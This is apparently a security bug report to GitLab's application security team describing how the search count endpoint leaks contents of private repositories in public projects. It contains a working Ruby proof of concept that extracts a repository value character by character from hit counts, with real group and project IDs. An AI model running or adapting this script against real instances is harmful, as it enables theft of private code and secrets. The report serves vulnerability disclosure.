Search count can leak content of private repositories in public projects
### Summary
Using `https://gitlab.com/search/count` it is possible to leak information from private repositories in public projects.
### Steps to reproduce
The following script illustrates the issue by leaking character by character the [`GITLAB_APP_SECRET`](https://gitlab.com/gitlab-org/customers-gitlab-com/-/blob/main/.env.example#L6) test value from the `customers-gitlab-com` repo which is not public (but the project is). (Note the value isn't secret, it's being defined [here](https://gitlab.com/gitlab-org/gitlab/blob/9f04c2234bf6ba4f4a7619d1718afab5a26accfe/db/fixtures/development/28_integrations.rb#L17-L17))
```ruby
#!/usr/bin/ruby
require 'httparty'
require 'json'
COUNT ='
.wwwwwwww.
.w" "WW" "w.
." /\ /\ ".
|\ o o /|
\| ___\/___ |/
/ \ \_v__v_/ / \
/ | \________/ | \
> \ WWWW / <
\ \ "" / /
\ \ / /
'
repo_id = '2670515' # gitlab-org/customers-gitlab-com
group_id = '9970' # gitlab-org
partial_string = "GITLAB_APP_SECRET="
puts COUNT
puts
puts "~> Starting the count attack!"
puts
@chars = %W[a b c d e f 0 1 2 3 4 5 6 7 8 9] # adjust as needed
@results = {}
def find_next(url, str)
iterations = 0
@chars.each do |c|
response = HTTParty.get(url+str+c+"%22")
count = JSON.parse(response.body)
if count["count"] != "0"
follow = str + c
puts "~> Count found: #{follow}"
find_next(url,follow)
end
iterations += 1
end
end
find_next("https://gitlab.com/search/count?group_id=#{group_id}&scope=blobs&search=r%3A#{repo_id}%20%22#{CGI.escape(partial_string)}","")
```
In the demo script we're limiting the search results with `r:2670515` in the query to the `customers-gitlab-com` repo, `2670515` is that repo's project id.
### What is the current *bug* behavior?
Search hit count leaks for private repos in public projects.
### What is the expected *correct* behavior?
The search hit count should not include private repositories.
### Relevant logs and/or screenshots
### Output of checks
<!-- If you are reporting a bug on GitLab.com, write: This bug happens on GitLab.com -->
This bug happens on GitLab.com
---
<!-- Do not edit past here unless you are certain of the impact -->
cc @gitlab-com/gl-security/appsec
issue